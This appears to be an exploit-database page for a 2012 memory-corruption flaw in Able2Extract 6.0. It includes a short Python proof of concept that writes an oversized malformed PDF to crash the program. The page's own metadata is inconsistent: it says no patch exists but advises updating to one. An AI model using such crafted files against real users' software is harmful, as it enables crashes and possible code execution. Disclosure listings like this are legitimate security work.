header-logo
Suggest Exploit
vendor:
Able2Extract
by:
Carlos Mario Penagos Hollmann
7.5
CVSS
HIGH
Memory Corruption
119
CWE
Product Name: Able2Extract
Affected Version From: 6
Affected Version To: 6
Patch Exists: NO
Related CWE: CVE-2011-4222
CPE: a:investintech:able2extract:6.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 7
2012

Able2Extract and Able2Extract Server v 6.0 Memory Corruption

The exploit involves creating a malicious PDF file with a payload that causes a memory corruption in Able2Extract and Able2Extract Server v 6.0. By opening the crafted PDF file, an attacker can trigger the memory corruption and potentially execute arbitrary code.

Mitigation:

To mitigate this vulnerability, users are advised to update to a patched version of Able2Extract and Able2Extract Server. Additionally, exercise caution when opening PDF files from untrusted sources.
Source

Exploit-DB raw data:

# Exploit Title: Able2Extract and Able2Extract Server v 6.0 Memory
Corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4222


payload ="A"*12000
crash="startxref"
pdf=payload+crash

filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()

Navigation

Suggest Exploit

Services By CQR

cqrsecured